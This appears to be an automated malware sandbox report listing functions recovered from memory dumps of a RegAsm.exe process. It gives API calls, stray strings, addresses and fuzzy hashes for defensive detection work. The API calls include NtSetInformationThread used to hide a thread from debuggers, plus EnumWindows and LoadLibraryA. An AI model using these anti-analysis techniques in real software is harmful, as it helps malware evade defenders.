P|@, xrefs: 222F4F0F
`L@, xrefs: 222F28F9
@C@, xrefs: 222F211A
L@, xrefs: 222F28B8
0@, xrefs: 222FB5A3
0T@, xrefs: 222F3056
p@, xrefs: 222FB6E8
R@, xrefs: 222F2E8F
0@, xrefs: 222FB8AF
0A, xrefs: 222FD254
0[@, xrefs: 222F3425
P9@, xrefs: 222F1837
p&@, xrefs: 222F06D2
S@, xrefs: 222F2F93
9@, xrefs: 222F18B9
P5@, xrefs: 222F1454
pc@, xrefs: 222F3ABF
p(@, xrefs: 222F0899
p}@, xrefs: 222F5013
`K@, xrefs: 222F27F5
`O@, xrefs: 222F2C05
`A, xrefs: 222FD560
pA, xrefs: 222FD191
@r@, xrefs: 222F462C
A, xrefs: 222FD150
0j@, xrefs: 222F3F51
P@, xrefs: 222F2CC8
0z@, xrefs: 222F4D48
"@, xrefs: 222F0344
0@, xrefs: 222FB7AB
p@, xrefs: 222FB4E0
>@, xrefs: 222F1D4B
0,@, xrefs: 222F0C27
P.@, xrefs: 222F0DEE
R@, xrefs: 222F2F52
`@@, xrefs: 222F1E90
I@, xrefs: 222F262E
PG@, xrefs: 222F24A8
`S@, xrefs: 222F2FD4
0g@, xrefs: 222F3D49
G@, xrefs: 222F252A
@@, xrefs: 222FB972
A, xrefs: 222FD51F
pH@, xrefs: 222F25AC
0@, xrefs: 222FB6A7
0a@, xrefs: 222F3939
`R@, xrefs: 222F2ED0
P @, xrefs: 222F00BD
@?@, xrefs: 222F1D8C
0E@, xrefs: 222F22E1
02@, xrefs: 222F11AA
@~@, xrefs: 222F50D6
`>@, xrefs: 222F1CC9
J@, xrefs: 222F26F1
O@, xrefs: 222F2BC4
N@, xrefs: 222F2AC0
M@, xrefs: 222F29BC
`M@, xrefs: 222F29FD
0^@, xrefs: 222F36AF
P@, xrefs: 222FAC7F
P"@, xrefs: 222F02C2
P=@, xrefs: 222F1BC5
P`@, xrefs: 222F3876
0@, xrefs: 222FB215
P{@, xrefs: 222F4E4C
P@, xrefs: 222FAF4A
p@, xrefs: 222FB7EC
Pe@, xrefs: 222F3C04
Pu@, xrefs: 222F48F7
#@, xrefs: 222F0448
p1@, xrefs: 222F10F0
p[@, xrefs: 222F3466
pT@, xrefs: 222F3097
`J@, xrefs: 222F2732
P-@, xrefs: 222F0D2B
PF@, xrefs: 222F23E5
p:@, xrefs: 222F193B
N@, xrefs: 222F2B83
@x@, xrefs: 222F4B81
p@, xrefs: 222FB152
`_@, xrefs: 222F37B3
Q@, xrefs: 222F2E4E

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID: A$ A$ #@$ $@$ %@$ /@$ <@$ >@$ B@$ H@$ I@$ J@$ K@$ L@$ M@$ N@$ O@$ P@$ R@$ S@$ Y@$ _@$ o@$ v@$ }@$0A$0&@$0(@$0)@$0,@$00@$01@$02@$0:@$0E@$0T@$0[@$0]@$0^@$0a@$0d@$0g@$0j@$0z@$0@$0@$0@$0@$0@$0@$0@$@'@$@3@$@4@$@?@$@A@$@C@$@p@$@r@$@t@$@x@$@~@$@@$P @$P!@$P"@$P*@$P-@$P.@$P5@$P6@$P7@$P8@$P9@$P;@$P=@$PF@$PG@$PQ@$PV@$P`@$Pb@$Pe@$Ph@$Pk@$Pm@$Pn@$Ps@$Pu@$Pw@$P{@$P|@$P@$P@$P@$P@$P@$`A$`#@$`$@$`%@$`+@$`>@$`@@$`B@$`D@$`J@$`K@$`L@$`M@$`N@$`O@$`R@$`S@$`X@$`_@$`o@$`q@$`y@$pA$p&@$p(@$p)@$p,@$p/@$p0@$p1@$p2@$p:@$pH@$pP@$pT@$p[@$p]@$pc@$pf@$pi@$pl@$pv@$p}@$p@$p@$p@$p@$p@$p@$A$"@$#@$$@$'@$.@$9@$;@$>@$G@$H@$K@$L@$M@$N@$O@$Q@$R@$X@$u@$|@$@$@
API String ID: 0-1818204334
Opcode ID: 6236a312e409107eef8e209dc2b7ed355c7b62ff84e15342d2b8a5bf9e08bef6
Instruction ID: 8267aff0e2bac76b64c56bc3ba0a24431a4a34b28feaad81713e15446de66385
Opcode Fuzzy Hash: 6236a312e409107eef8e209dc2b7ed355c7b62ff84e15342d2b8a5bf9e08bef6
Instruction Fuzzy Hash: 5434AE75A043588FF318CB20C958B9BB3D2BBC9304F82C92995496F7E1CBB95D41DBA1

Uniqueness

Uniqueness Score: 100.00%

Function 22CF1E40, Relevance: 29.2, APIs: 4, Strings: 12, Instructions: 1242libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF1FE4
KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
<, xrefs: 22CF36F6
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
<, xrefs: 22CF3B13
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: 5$ <$ ?$ B$@5$@?$@B$`4$5$<$?$B
API String ID: 2638914809-3251721556
Opcode ID: 2eb8b66514c7941988d54e2ddcceb12b336ef9e3ad5df85199066111258843cc
Instruction ID: 2b0f708f54b4ccbfaa110068768de6ddb4d8dc0f466f04dbfaba89b2e51dcba7
Opcode Fuzzy Hash: 2eb8b66514c7941988d54e2ddcceb12b336ef9e3ad5df85199066111258843cc
Instruction Fuzzy Hash: 68D2F7B4A006288FDB64CF24CD94B9AB7B2FF88310F1085EAD909A7354DB359E91CF55

Uniqueness

Uniqueness Score: 100.00%

Function 0112039C, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 222
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(0112044D,?,00000000), ref: 011203A2
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
oC8@, xrefs: 01120BAA
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T$I:?.$oC8@
API String ID: 1954852945-3801475756
Opcode ID: db426d3443b88fdfb366edd970c7ea50026487f51c63916685d9d7ec4e2aa7bb
Instruction ID: 9c1f28a9052d10d1abdf32ed0b3a0c1b69ed561ab9d43762a2ba0dc18eb32fb6
Opcode Fuzzy Hash: db426d3443b88fdfb366edd970c7ea50026487f51c63916685d9d7ec4e2aa7bb
Instruction Fuzzy Hash: 5161D870604376EAEF3C6F648C80BAE3651AF6D718F224626FD06A65C0C775D5B0C653

Uniqueness

Uniqueness Score: 100.00%

Function 22CF3DE9, Relevance: 7.8, Strings: 6, Instructions: 340
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4X=s, xrefs: 22CF3F5D
`O=s, xrefs: 22CF3EAC
`O=s, xrefs: 22CF3EE7
W<s, xrefs: 22CF3E19
`O=s, xrefs: 22CF3E4F
`O=s, xrefs: 22CF3F43

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: 4X=s$`O=s$`O=s$`O=s$`O=s$W<s
API String ID: 0-4067494737
Opcode ID: fa6a4040edcbc353adf1c98867458166d440f5ae78a5a0377a1c41f573c90cae
Instruction ID: 70f1f1f97168c585ecaf287be0491aa5621b09449a000996b5430dcf8509c77a
Opcode Fuzzy Hash: fa6a4040edcbc353adf1c98867458166d440f5ae78a5a0377a1c41f573c90cae
Instruction Fuzzy Hash: BEC15B34E003589FEB54DFA8C950BAEB7F2AF89304F20856AE505AF395DB759C01CB51

Uniqueness

Uniqueness Score: 100.00%

Function 22CFC980, Relevance: 6.6, Strings: 5, Instructions: 371
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`O=s, xrefs: 22CFCDA0
`O=s, xrefs: 22CFCB24
`O=s, xrefs: 22CFCDEB
`O=s, xrefs: 22CFCBD1
`O=s, xrefs: 22CFCB76

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: `O=s$`O=s$`O=s$`O=s$`O=s
API String ID: 0-2785870281
Opcode ID: 1ea2f279e01986d35c475822e1b69e5be9233f5c82d22d587f5f783bf077a6e6
Instruction ID: 2ece47ab515dea3b81e8934cde911cbe84d93b5c632a5045f721dce47d0f2889
Opcode Fuzzy Hash: 1ea2f279e01986d35c475822e1b69e5be9233f5c82d22d587f5f783bf077a6e6
Instruction Fuzzy Hash: 49D17D70F003189BEB58DBB9C950B6EB6E7AFC8304F208569D509EB394DE71AD01CB91

Uniqueness

Uniqueness Score: 100.00%

Function 22CFC971, Relevance: 6.6, Strings: 5, Instructions: 347
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`O=s, xrefs: 22CFCDA0
`O=s, xrefs: 22CFCB24
`O=s, xrefs: 22CFCDEB
`O=s, xrefs: 22CFCBD1
`O=s, xrefs: 22CFCB76

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: `O=s$`O=s$`O=s$`O=s$`O=s
API String ID: 0-2785870281
Opcode ID: cc6b007987d589fa1eb41ffe889b01673f4000774a5926cd8cc3f67bd425b24f
Instruction ID: f8b02227d15a03118232c2f03c2b47027453cdb5e0b210cc3744a952e0eccbf5
Opcode Fuzzy Hash: cc6b007987d589fa1eb41ffe889b01673f4000774a5926cd8cc3f67bd425b24f
Instruction Fuzzy Hash: 44C1AE70B003089BE758DBB9C850B6EB6E7AFC8304F20C569D50AEB395DE71AD01DB91

Uniqueness

Uniqueness Score: 100.00%

Function 222FE870, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 661UNIQUE

Download Yara Rule

Strings

2=s, xrefs: 222FE98A
2=s, xrefs: 222FE9D2

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID: 2=s$2=s
API String ID: 0-2688261760
Opcode ID: b3f88419c972a33d9000d9c2a6e8ee753c810f596f4a929e57b202b978fefed9
Instruction ID: 27aa23175b024287453957976d9ab94927bab63d03bdefc6f964e3ef17378940
Opcode Fuzzy Hash: b3f88419c972a33d9000d9c2a6e8ee753c810f596f4a929e57b202b978fefed9
Instruction Fuzzy Hash: 07422170B143058BD709DB78CA54A5EB7A7AF80700F14862AD50ADB3E9CF3ADD45CB82

Uniqueness

Uniqueness Score: 100.00%

Function 222FE880, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 657
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2=s, xrefs: 222FE98A
2=s, xrefs: 222FE9D2

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID: 2=s$2=s
API String ID: 0-2688261760
Opcode ID: 5a6f890f6f1a8641c5e286992aa0ebf7cafe5d5a89a96043947889444d298f80
Instruction ID: d30e9d7c0997b4a4dc44efd94f496da5b5a37a0fbf9de268e5ba70b35bb74da1
Opcode Fuzzy Hash: 5a6f890f6f1a8641c5e286992aa0ebf7cafe5d5a89a96043947889444d298f80
Instruction Fuzzy Hash: 71421270B143058BD7099B78CA54A1EB7A7AF80704F14862AD50ADB3E9DF3ADD45CB82

Uniqueness

Uniqueness Score: 100.00%

Function 011205A8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$I:?.
API String ID: 543350213-2999128404
Opcode ID: fcb00ddaa5fc6d9e95fc7bf137ea33f89c286c2165537891ec2cdc9a74aa6a82
Instruction ID: ef3aa3ea25f59558bb4aaf8a9177a27bd60caf9cc8f32432c91939e8f0734b4b
Opcode Fuzzy Hash: fcb00ddaa5fc6d9e95fc7bf137ea33f89c286c2165537891ec2cdc9a74aa6a82
Instruction Fuzzy Hash: A24175E190E7F0D9DF3BAB2848D47562EA04BB7105F5603D9E5435E88AE2D88030DBB3

Uniqueness

Uniqueness Score: 100.00%

Function 011204A8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$I:?.
API String ID: 543350213-2999128404
Opcode ID: c5dcab28d8fbc208878a7fdbaa25aaa6ef9817c2179fa82924b739cc51001140
Instruction ID: c489ef49623c0b5ebc1ae46d96064b78aa7194f0d104be19dfcf11b523ee4755
Opcode Fuzzy Hash: c5dcab28d8fbc208878a7fdbaa25aaa6ef9817c2179fa82924b739cc51001140
Instruction Fuzzy Hash: 7F41F5A0A097B1CADF3EAB6448D475A3A905B76205F120399F9435F5C5E7A88470CBB3

Uniqueness

Uniqueness Score: 100.00%

Function 011204FD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$I:?.
API String ID: 543350213-2999128404
Opcode ID: 0bee7fb989c17e1f85e3d8d706e9a5da9e1620ffef3dfcbe746ce6100b5527a8
Instruction ID: 95e60a1b6c52b413013c60d5717a3345012550d5ddc293801be617377770d3a8
Opcode Fuzzy Hash: 0bee7fb989c17e1f85e3d8d706e9a5da9e1620ffef3dfcbe746ce6100b5527a8
Instruction Fuzzy Hash: 9441F7A0A0D7B1D9EF3FAF6448D475A3A905B7A205F120399F9435E5C5E3A88430CBB3

Uniqueness

Uniqueness Score: 100.00%

Function 01120548, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$I:?.
API String ID: 543350213-2999128404
Opcode ID: 0906cf40cf7ab4d5c3e058160d07a908409070b2549589d29b0bd0da0a2bbafc
Instruction ID: 970334b3ae140ba4bce6a0d5a3e51e629568061d196bcd89c91a239ea264e166
Opcode Fuzzy Hash: 0906cf40cf7ab4d5c3e058160d07a908409070b2549589d29b0bd0da0a2bbafc
Instruction Fuzzy Hash: 0441E6A1A0D7B1DAEF3FAB2448D475A3A905B77209F160399E9531E5C5D7A48030CBB3

Uniqueness

Uniqueness Score: 100.00%

Function 01120644, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$I:?.
API String ID: 543350213-2999128404
Opcode ID: 10fe079fe1e19b23fcee65ded75fe74784bc6a04164b3169716befe37f1fb53f
Instruction ID: 57b022b2d2e1d9d2afcd9d165ec12898a1f73c99eb27c4c533b65b2aaf4a3605
Opcode Fuzzy Hash: 10fe079fe1e19b23fcee65ded75fe74784bc6a04164b3169716befe37f1fb53f
Instruction Fuzzy Hash: D231F6E190D7B189DF3FAA2448D475A2E904B77205F560399E9435E985E3A88030CBB3

Uniqueness

Uniqueness Score: 100.00%

Function 011204A6, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B
1.!T, xrefs: 011206DD

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$I:?.
API String ID: 543350213-2999128404
Opcode ID: 025d6fe26e5d158771cc69d03d6dcb83ecafb92ff53456eeb4fff36df1c50b8c
Instruction ID: 04d59cb17d3fd2817bc1d56bd54105c03e50327bc9153dc2954adfc6bdca8a85
Opcode Fuzzy Hash: 025d6fe26e5d158771cc69d03d6dcb83ecafb92ff53456eeb4fff36df1c50b8c
Instruction Fuzzy Hash: 5131D670A04335DAEF3C6F618C80BAE26919B69758F214726FE165A6C0D7B4C570C663

Uniqueness

Uniqueness Score: 100.00%

Function 22CF2EC4, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 405UNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Strings

<, xrefs: 22CF36F6

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: <
API String ID: 6842923-3994965447
Opcode ID: 174231a8e5262fd7c47d14ffe8894adabb62910c828db74e7c6c16caee7591ea
Instruction ID: 1320cde81696fafc1eb484acb371d6077ec7abfb0f420721fc832a4d4b45c667
Opcode Fuzzy Hash: 174231a8e5262fd7c47d14ffe8894adabb62910c828db74e7c6c16caee7591ea
Instruction Fuzzy Hash: 8E121C74A00219DFDB64CF28C994B9AB7F2BF88310F1086EAD909A7354DB359E91CF54

Uniqueness

Uniqueness Score: 100.00%

Function 01120694, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Strings

I:?., xrefs: 0112091B

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: I:?.
API String ID: 543350213-1789693726
Opcode ID: 4ec8275f8eeaf6addf3678a5371d2d0b3cf2e806b8b1e467a29a5bf2c3e0081c
Instruction ID: 98539205fc18fd624ae7c2dce4628f4e0f6216bebbdeca1488646fb2bc5c7386
Opcode Fuzzy Hash: 4ec8275f8eeaf6addf3678a5371d2d0b3cf2e806b8b1e467a29a5bf2c3e0081c
Instruction Fuzzy Hash: 1D4133E190D7F4C9DF3BAA6844D435A3EA04BB7115F9603D9D5834E88AE2984070DBB3

Uniqueness

Uniqueness Score: 100.00%

Function 0112072C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
nativethreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01120780

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Strings

I:?., xrefs: 0112091B

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InformationLibraryLoadThread
String ID: I:?.
API String ID: 543350213-1789693726
Opcode ID: 3613c767deb1a991509ede3554b183ab8e50f66b74401644912c235fcc816be9
Instruction ID: ec6a9f8f385699068169ee8be59d0ec0d682199588f64a03d19a7bf3a699d3b0
Opcode Fuzzy Hash: 3613c767deb1a991509ede3554b183ab8e50f66b74401644912c235fcc816be9
Instruction Fuzzy Hash: 8E31E8E190D7F589DF3FAA7448D434A3E604B77215F56039AE5434E486E3988070DBB3

Uniqueness

Uniqueness Score: 100.00%

Function 01124EF6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
libraryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0112179A,?,00000000,01126193,?,1C200000,D53F1CDA), ref: 01125CBD

Strings

ntdll, xrefs: 01125D61

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: ntdll
API String ID: 2994545307-3337577438
Opcode ID: c34b6bb15ced2d8762619d5d11a8396f63fac5773272a3a00e0356a5de3c7ae8
Instruction ID: ff155a4eb51249c5fb0cad45209f6f734adc4d61d66be8e5facb799bb6397caf
Opcode Fuzzy Hash: c34b6bb15ced2d8762619d5d11a8396f63fac5773272a3a00e0356a5de3c7ae8
Instruction Fuzzy Hash: 7BE07D26A443BB0EE16C712445CA1DE3F528B55114B0EC106C001039159F046E2B935B

Uniqueness

Uniqueness Score: 100.00%

Function 01122907, Relevance: 3.1, APIs: 2, Instructions: 110sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000B62B,00000000,00000000,00000000), ref: 01122B36

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b80a5ce8a1a9ac17b0fb12380d66e82fa2fbdac6b449adaa0f6966d8b150e344
Instruction ID: 15869bfb58358a65098e5aec68693c222a5f812cfb0025c6eef22ca027578043
Opcode Fuzzy Hash: b80a5ce8a1a9ac17b0fb12380d66e82fa2fbdac6b449adaa0f6966d8b150e344
Instruction Fuzzy Hash: 83310431648361DFEB3C5F14CC88FADB2A4FF51314F128126E5565B9D1C7B498A0CA53

Uniqueness

Uniqueness Score: 0.00%

Function 22CF07E0, Relevance: 2.7, Strings: 2, Instructions: 175UNIQUE

Download Yara Rule

Strings

P.=s, xrefs: 22CF0804
`7, xrefs: 22CF1C4A

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: P.=s$`7
API String ID: 0-659295195
Opcode ID: fbeb56106657c87376fd36d855ffea140703074faeb9de76c7dc97692b03e497
Instruction ID: 95236014403171f548fdfa99b4b39b65b456971d393777851bb98cf2b94e6540
Opcode Fuzzy Hash: fbeb56106657c87376fd36d855ffea140703074faeb9de76c7dc97692b03e497
Instruction Fuzzy Hash: 8D814B74E0026D8FDBA4CF29C988799B7F2BB88300F1085EAD50DE7354DA719E818F90

Uniqueness

Uniqueness Score: 100.00%

Function 222FECA4, Relevance: 1.9, APIs: 1, Instructions: 390COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 222FEFD1

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1cb90b2b3b214fa6cb1cc27645a6f37b505d824826c3bb3b5d7924348b188549
Instruction ID: 5a5384e86510a037bb4e420212efd01361a92c083bb2f27b01d15d6d5ef64204
Opcode Fuzzy Hash: 1cb90b2b3b214fa6cb1cc27645a6f37b505d824826c3bb3b5d7924348b188549
Instruction Fuzzy Hash: CEE10271A14200CBC309DB78CA54A1DBBA6AF90704F19866ED5069F7EACF3BDD45C782

Uniqueness

Uniqueness Score: 0.05%

Function 222FED16, Relevance: 1.9, APIs: 1, Instructions: 366COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 222FEFD1

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
